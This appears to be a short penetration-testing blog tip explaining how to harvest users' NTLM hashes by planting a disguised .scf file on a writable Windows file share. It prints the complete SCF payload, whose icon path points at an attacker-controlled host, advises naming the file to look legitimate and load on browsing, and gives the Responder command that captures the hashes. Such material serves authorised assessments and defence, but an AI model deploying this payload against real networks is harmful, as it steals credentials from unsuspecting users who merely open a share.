Have you ever been on a internal network assessment and discovered an unauthenticated writable Windows-based file share? Well, in addition to finding potentially sensitive information, you can abuse this to gather user hashes from users who are browsing the file share.

An SCF File

In this attack, we are going to place a special file with a SCF file extension onto the file share.

SCF files can be used to control Windows Explorer, but in this case, we are going to use one to elicit an unsuspecting user to submit their NTLMv1/2 hash to us, the attacker.

The following code should be placed within a .scf file:

[Shell] Command=2 IconFile=\\192.168.0.12\share\test.ico [Taskbar] Command=ToggleDesktop

NOTE: Replace with your IP address of where you have Responder listening.

When naming the SCF file, I would also recommend calling the file something that matches the contents of the file share to make it appear like it belongs. In addition, the file needs to be seen by Windows Explorer so add a ~ or a @ symbol to the start of the file name to ensure the file is executed as soon as the share is browsed. This will place the file to the top of the directory. 🙂

The Attack

Once the SCF file has been placed on the file share, fire up Responder.

responder -wrf --lm -v -I eth0

Now, when any users browse the file share, you should receive their hash!

Hopefully, you found this little tip helpful!

– 5ub34x